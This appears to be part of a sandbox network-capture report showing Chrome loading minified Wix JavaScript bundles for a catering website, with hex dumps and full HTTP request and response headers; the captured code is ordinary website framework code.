                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 29 2c 73 28 7b 63 6f 6e 74 61 69 6e 65 72 43 68 69 6c 64 72 65 6e 3a 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 49 2c 4f 29 7d 29 29 7d 2c 78 3d 61 2e 66 6f 72 77 61 72 64 52 65 66 28 43 29 2c 79 3d 28 65 2c 74 29 3d 3e 7b 65 2e 6d 65 73 68 50 72 6f 70 73 7c 7c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 43 6f 6e 74 61 69 6e 65 72 5f 4e 6f 53 6b 69 6e 2e 73 6b 69 6e 3a 20 57 61 72 6e 69 6e 67 21 20 6d 65 73 68 50 72 6f 70 73 20 61 72 65 20 6d 69 73 73 69 6e 67 20 66 6f 72 20 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3a 20 22 2b 65 2e 69 64 29 3b 63 6f 6e 73 74 20 72 3d 65 2e 6d 65 73 68 50 72 6f 70 73 7c 7c 7b 77 65 64 67 65 73 3a 65 2e 77 65 64 67 65 73 7c 7c 5b 5d 2c 72 6f 74 61 74 65 64 43 6f 6d 70 6f 6e 65 6e 74 73 3a 65 2e 72 6f 74 61 74 65 64 43 6f 6d
                                                                                                                                                                                                                        Data Ascii: ),s({containerChildren:a.createElement(I,O)}))},x=a.forwardRef(C),y=(e,t)=>{e.meshProps||console.warn("Container_NoSkin.skin: Warning! meshProps are missing for component id: "+e.id);const r=e.meshProps||{wedges:e.wedges||[],rotatedComponents:e.rotatedCom
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 3f 69 2e 6c 65 6e 67 74 68 26 26 28 72 5b 6f 5d 3d 69 2c 69 3d 5b 5d 29 3a 69 2e 70 75 73 68 28 6f 29 3b 76 61 72 20 73 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 74 29 7b 69 66 28 72 5b 63 5d 29 66 6f 72 28 61 3d 30 3b 61 3c 72 5b 63 5d 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61 72 20 6c 3d 72 5b 63 5d 5b 61 5d 3b 73 5b 72 5b 63 5d 5b 61 5d 5d 3d 6e 28 6c 29 7d 73 5b 63 5d 3d 6e 28 63 29 7d 66 6f 72 28 61 3d 30 3b 61 3c 69 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 73 5b 69 5b 61 5d 5d 3d 6e 28 69 5b 61 5d 29 3b 72 65 74 75 72 6e 20 73 7d 28 74 2c 72 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 69 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 76 61 72 20 73 3d 69 5b 6f 5d 3b 69 66 28 28 30 2c 61 2e 69 73 56 61
                                                                                                                                                                                                                        Data Ascii: ?i.length&&(r[o]=i,i=[]):i.push(o);var s={};for(var c in t){if(r[c])for(a=0;a<r[c].length;a++){var l=r[c][a];s[r[c][a]]=n(l)}s[c]=n(c)}for(a=0;a<i.length;a++)s[i[a]]=n(i[a]);return s}(t,r);return Object.keys(i).forEach((function(o){var s=i[o];if((0,a.isVa
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 30 2c 61 70 70 65 61 72 3a 53 28 65 2c 22 61 70 70 65 61 72 22 2c 6e 29 2c 65 6e 74 65 72 3a 53 28 65 2c 22 65 6e 74 65 72 22 2c 6e 29 2c 65 78 69 74 3a 53 28 65 2c 22 65 78 69 74 22 2c 6e 29 7d 29 7d 29 29 29 3a 50 28 65 2c 69 2c 6f 29 2c 66 69 72 73 74 52 65 6e 64 65 72 3a 21 31 7d 7d 2c 6e 2e 68 61 6e 64 6c 65 45 78 69 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 52 28 74 68 69 73 2e 70 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 29 3b 65 2e 6b 65 79 20 69 6e 20 6e 7c 7c 28 65 2e 70 72 6f 70 73 2e 6f 6e 45 78 69 74 65 64 26 26 65 2e 70 72 6f 70 73 2e 6f 6e 45 78 69 74 65 64 28 74 29 2c 74 68 69 73 2e 6d 6f 75 6e 74 65 64 26 26 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 41 28
                                                                                                                                                                                                                        Data Ascii: 0,appear:S(e,"appear",n),enter:S(e,"enter",n),exit:S(e,"exit",n)})}))):P(e,i,o),firstRender:!1}},n.handleExited=function(e,t){var n=R(this.props.children);e.key in n||(e.props.onExited&&e.props.onExited(t),this.mounted&&this.setState((function(t){var n=A(
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 21 30 2c 74 68 69 73 2e 61 70 70 65 61 72 53 74 61 74 75 73 29 7d 2c 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 3b 69 66 28 65 21 3d 3d 74 68 69 73 2e 70 72 6f 70 73 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 73 74 61 74 65 2e 73 74 61 74 75 73 3b 74 68 69 73 2e 70 72 6f 70 73 2e 69 6e 3f 6e 21 3d 3d 57 26 26 6e 21 3d 3d 7a 26 26 28 74 3d 57 29 3a 6e 21 3d 3d 57 26 26 6e 21 3d 3d 7a 7c 7c 28 74 3d 5a 29 7d 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 21 31 2c 74 29 7d 2c 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 63 61 6e 63 65 6c 4e 65 78
                                                                                                                                                                                                                        Data Ascii: this.updateStatus(!0,this.appearStatus)},n.componentDidUpdate=function(e){var t=null;if(e!==this.props){var n=this.state.status;this.props.in?n!==W&&n!==z&&(t=W):n!==W&&n!==z||(t=Z)}this.updateStatus(!1,t)},n.componentWillUnmount=function(){this.cancelNex


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        98192.168.2.55003034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC640OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 65196
                                                                                                                                                                                                                        X-Amz-Replication-Status: PENDING
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: B7govMAc84fKseiCBqgCN8YsSk.lG8HL
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 970554116 1046688347
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 202347132
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 10:05:59 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 791229
                                                                                                                                                                                                                        Last-Modified: Wed, 01 Jan 2025 10:03:24 GMT
                                                                                                                                                                                                                        ETag: "23bc9398fe583a0ff53597e69d064a5f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC228INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 2c 5b 22 72 65 61 63 74 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap-classic",["react"],t):"object"==typeof exports?expo
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 5d 3d 74 28 65 2e 52 65 61 63 74 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 39 36 31 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d
                                                                                                                                                                                                                        Data Ascii: rts["rb_wixui.thunderbolt_bootstrap-classic"]=t(require("react")):e["rb_wixui.thunderbolt_bootstrap-classic"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={96114:function(e,t,a){var n;!function(t){"use strict";var i=
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 29 26 26 28 65 5b 61 5d 3d 74 5b 61 5d 29 7d 28 74 2c 65 29 2c 74 2e 66 61 73 74 64 6f 6d 3d 74 68 69 73 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 26 26 74 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 2c 74 7d 2c 63 61 74 63 68 3a 6e 75 6c 6c 7d 3b 76 61 72 20 64 3d 74 2e 66 61 73 74 64 6f 6d 3d 74 2e 66 61 73 74 64 6f 6d 7c 7c 6e 65 77 20 6f 3b 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2e 63 61 6c 6c 28 64 2c 61 2c 64 2c 65 29 29 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 6e 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 76 6f 69
                                                                                                                                                                                                                        Data Ascii: on(e,t){for(var a in t)t.hasOwnProperty(a)&&(e[a]=t[a])}(t,e),t.fastdom=this,t.initialize&&t.initialize(),t},catch:null};var d=t.fastdom=t.fastdom||new o;void 0===(n=function(){return d}.call(d,a,d,e))||(e.exports=n)}("undefined"!=typeof window?window:voi
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 6e 2e 64 28 65 2c 7b 53 54 41 54 49 43 5f 4d 45 44 49 41 5f 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 74 7d 2c 70 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 74 7d 7d 29 3b 76 61 72 20 74 3d 6e 28 34 34 38 29 2c 61 3d 6e 2e 6e 28 74 29 2c 72 3d 6e 28 35 33 32 39 29 2c 6f 3d 6e 2e 6e 28 72 29 3b 63 6f 6e 73 74 20 73 3d 31 33 2c 63 3d 32 37 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 3d 3e 7b 74 2e 6b 65 79 43 6f 64 65 3d 3d 3d 65 26 26 28 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 63 6c 69 63 6b 28 29 29 7d 7d 63 6f 6e 73 74 20 64 3d 6c 28 33 32 29 2c 75 3d 6c 28 73
                                                                                                                                                                                                                        Data Ascii: n.d(e,{STATIC_MEDIA_URL:function(){return Ut},ph:function(){return Bt}});var t=n(448),a=n.n(t),r=n(5329),o=n.n(r);const s=13,c=27;function l(e){return t=>{t.keyCode===e&&(t.preventDefault(),t.stopPropagation(),t.currentTarget.click())}}const d=l(32),u=l(s
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 65 79 44 6f 77 6e 3a 44 2c 22 61 72 69 61 2d 6c 69 76 65 22 3a 4d 2c 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 3a 6b 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 4e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 4f 2c 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 3a 52 2c 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 3a 50 2c 22 61 72 69 61 2d 68 61 73 70 6f 70 75 70 22 3a 78 2c 22 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 22 3a 53 2c 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 3a 46 2c 74 69 74 6c 65 3a 54 2c 6f 6e 43 6c 69 63 6b 3a 76 2c 6f 6e 4d 6f 75 73 65 45 6e 74 65 72 3a 4c 2c 6f 6e 4d 6f 75 73 65 4c 65 61 76 65 3a 79 2c 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 3a 62 2c 6f 6e 46 6f 63 75 73 3a 77 2c 6f 6e 46 6f 63 75 73 43 61 70 74 75 72 65
                                                                                                                                                                                                                        Data Ascii: eyDown:D,"aria-live":M,"aria-disabled":k,"aria-label":N,"aria-labelledby":O,"aria-pressed":R,"aria-expanded":P,"aria-haspopup":x,"aria-describedby":S,"aria-current":F,title:T,onClick:v,onMouseEnter:L,onMouseLeave:y,onDoubleClick:b,onFocus:w,onFocusCapture
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 5d 26 26 6e 75 6c 6c 21 3d 3d 69 5b 65 5d 7c 7c 64 65 6c 65 74 65 20 69 5b 65 5d 7d 29 29 2c 69 7d 29 28 7b 2e 2e 2e 4f 2c 2e 2e 2e 52 2c 64 69 73 61 62 6c 65 64 3a 6e 75 6c 6c 21 3d 28 61 3d 52 2e 64 69 73 61 62 6c 65 64 29 3f 61 3a 50 2c 6c 61 62 65 6c 3a 6e 75 6c 6c 21 3d 28 6e 3d 6e 75 6c 6c 21 3d 28 69 3d 6e 75 6c 6c 3d 3d 4f 3f 76 6f 69 64 20 30 3a 4f 2e 6c 61 62 65 6c 29 3f 69 3a 52 2e 6c 61 62 65 6c 29 3f 6e 3a 45 7d 29 2c 47 3d 28 28 65 2c 74 2c 61 2c 6e 29 3d 3e 61 3f 2d 31 3a 65 3d 3d 3d 62 2e 42 75 74 74 6f 6e 3f 6e 3a 79 28 65 2c 74 29 3f 6e 75 6c 6c 21 3d 6e 3f 6e 3a 30 3a 6e 29 28 53 2c 67 2c 50 2c 78 29 2c 42 3d 28 28 65 2c 74 2c 61 29 3d 3e 79 28 65 2c 74 29 7c 7c 77 28 65 2c 61 29 3f 22 62 75 74 74 6f 6e 22 3a 76 6f 69 64 20 30 29 28 53
                                                                                                                                                                                                                        Data Ascii: ]&&null!==i[e]||delete i[e]})),i})({...O,...R,disabled:null!=(a=R.disabled)?a:P,label:null!=(n=null!=(i=null==O?void 0:O.label)?i:R.label)?n:E}),G=((e,t,a,n)=>a?-1:e===b.Button?n:y(e,t)?null!=n?n:0:n)(S,g,P,x),B=((e,t,a)=>y(e,t)||w(e,a)?"button":void 0)(S
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 70 73 3a 72 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 63 2c 61 75 74 6f 46 6f 63 75 73 3a 6c 2c 6f 6e 42 6c 75 72 3a 64 2c 6f 6e 46 6f 63 75 73 3a 75 2c 64 69 73 61 62 6c 65 64 3a 6d 7d 3d 65 3b 63 6f 6e 73 74 20 67 3d 6f 28 29 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 6f 28 29 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 28 74 2c 28 28 29 3d 3e 28 7b 66 6f 63 75 73 3a 28 29 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 65 3d 67 2e 63 75 72 72 65 6e 74 29 3f 76 6f 69 64 20 30 3a 65 2e 66 6f 63 75 73 28 29 7d 2c 62 6c 75 72 3a 28 29 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 65 3d 67 2e 63 75 72 72 65 6e 74 29 3f 76 6f 69 64 20 30 3a 65 2e 62 6c 75 72 28 29 7d 7d 29 29
                                                                                                                                                                                                                        Data Ascii: ps:r,className:s,children:c,autoFocus:l,onBlur:d,onFocus:u,disabled:m}=e;const g=o().useRef(null);o().useImperativeHandle(t,(()=>({focus:()=>{var e;return null==(e=g.current)?void 0:e.focus()},blur:()=>{var e;return null==(e=g.current)?void 0:e.blur()}}))
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 74 20 69 3d 28 65 3d 3e 28 7b 2e 2e 2e 65 2c 75 70 64 61 74 65 53 74 79 6c 65 73 3a 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2e 72 65 64 75 63 65 28 28 28 65 2c 5b 74 2c 61 5d 29 3d 3e 7b 72 65 74 75 72 6e 7b 2e 2e 2e 65 2c 5b 28 6e 3d 74 2c 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 2d 2d 22 29 3f 74 3a 59 28 74 29 29 5d 3a 76 6f 69 64 20 30 3d 3d 3d 61 3f 6e 75 6c 6c 3a 61 7d 3b 76 61 72 20 6e 7d 29 2c 7b 7d 29 3b 65 2e 75 70 64 61 74 65 53 74 79 6c 65 73 28 61 29 7d 7d 29 29 28 6e 29 3b 72 65 74 75 72 6e 20 65 28 7b 6d 61 70 70 65 72 50 72 6f 70 73 3a 74 2c 73 74 61 74 65 56 61 6c 75 65 73 3a 61 2c 63 6f 6e 74 72 6f 6c 6c 65 72 55 74 69 6c 73 3a 69 7d 29 7d 7d 29 2c 7a 3d 65 3d 3e 22 6c 69 6e 6b 50 6f 70 75
                                                                                                                                                                                                                        Data Ascii: t i=(e=>({...e,updateStyles:t=>{const a=Object.entries(t).reduce(((e,[t,a])=>{return{...e,[(n=t,n.startsWith("--")?t:Y(t))]:void 0===a?null:a};var n}),{});e.updateStyles(a)}}))(n);return e({mapperProps:t,stateValues:a,controllerUtils:i})}}),z=e=>"linkPopu
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 2c 75 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 64 65 74 61 69 6c 73 3a 6d 2c 65 6c 65 6d 65 6e 74 54 79 70 65 3a 73 3f 3f 22 55 6e 6b 6e 6f 77 6e 22 2c 61 63 74 69 6f 6e 4e 61 6d 65 3a 6f 3f 3f 6a 28 6e 29 2c 76 61 6c 75 65 3a 69 3f 3f 57 28 6e 2c 75 29 7d 7d 2c 7b 65 6e 64 70 6f 69 6e 74 3a 22 70 61 22 2c 2e 2e 2e 61 7d 29 7d 3b 76 61 72 20 5a 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 54 65 78 74 3d 22 54 65 78 74 22 2c 65 2e 4d 65 6e 75 3d 22 4d 65 6e 75 22 2c 65 2e 49 6d 61 67 65 3d 22 49 6d 61 67 65 22 2c 65 2e 49 6e 70 75 74 3d 22 49 6e 70 75 74 22 2c 65 2e 4c 6f 67 69 6e 3d 22 4c 6f 67 69 6e 22 2c 65 2e 42 75 74 74 6f 6e 3d 22 42 75 74 74 6f 6e 22 2c 65 2e 53 6f
                                                                                                                                                                                                                        Data Ascii: avigator.language,url:window.location.href,details:m,elementType:s??"Unknown",actionName:o??j(n),value:i??W(n,u)}},{endpoint:"pa",...a})};var Z;!function(e){e.Text="Text",e.Menu="Menu",e.Image="Image",e.Input="Input",e.Login="Login",e.Button="Button",e.So
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1390INData Raw: 72 20 61 65 3d 22 48 6c 52 7a 35 65 22 3b 63 6f 6e 73 74 20 6e 65 3d 22 76 31 22 2c 69 65 3d 32 2c 72 65 3d 31 39 32 30 2c 6f 65 3d 31 39 32 30 2c 73 65 3d 31 65 33 2c 63 65 3d 31 65 33 2c 6c 65 3d 7b 53 43 41 4c 45 5f 54 4f 5f 46 49 4c 4c 3a 22 66 69 6c 6c 22 2c 53 43 41 4c 45 5f 54 4f 5f 46 49 54 3a 22 66 69 74 22 2c 53 54 52 45 54 43 48 3a 22 73 74 72 65 74 63 68 22 2c 4f 52 49 47 49 4e 41 4c 5f 53 49 5a 45 3a 22 6f 72 69 67 69 6e 61 6c 5f 73 69 7a 65 22 2c 54 49 4c 45 3a 22 74 69 6c 65 22 2c 54 49 4c 45 5f 48 4f 52 49 5a 4f 4e 54 41 4c 3a 22 74 69 6c 65 5f 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 54 49 4c 45 5f 56 45 52 54 49 43 41 4c 3a 22 74 69 6c 65 5f 76 65 72 74 69 63 61 6c 22 2c 46 49 54 5f 41 4e 44 5f 54 49 4c 45 3a 22 66 69 74 5f 61 6e 64 5f 74 69
                                                                                                                                                                                                                        Data Ascii: r ae="HlRz5e";const ne="v1",ie=2,re=1920,oe=1920,se=1e3,ce=1e3,le={SCALE_TO_FILL:"fill",SCALE_TO_FIT:"fit",STRETCH:"stretch",ORIGINAL_SIZE:"original_size",TILE:"tile",TILE_HORIZONTAL:"tile_horizontal",TILE_VERTICAL:"tile_vertical",FIT_AND_TILE:"fit_and_ti


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        99192.168.2.55002934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC627OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_menu.647b0eb4.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:08 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 98646
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: CvYGKkI6JEqH_q7D1OSSTcMzV880uOXA
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 908086815 517511533
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 764474881
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:45:41 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 97647
                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 10:40:47 GMT
                                                                                                                                                                                                                        ETag: "52af04fefa6dec50032624da0190cffe"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
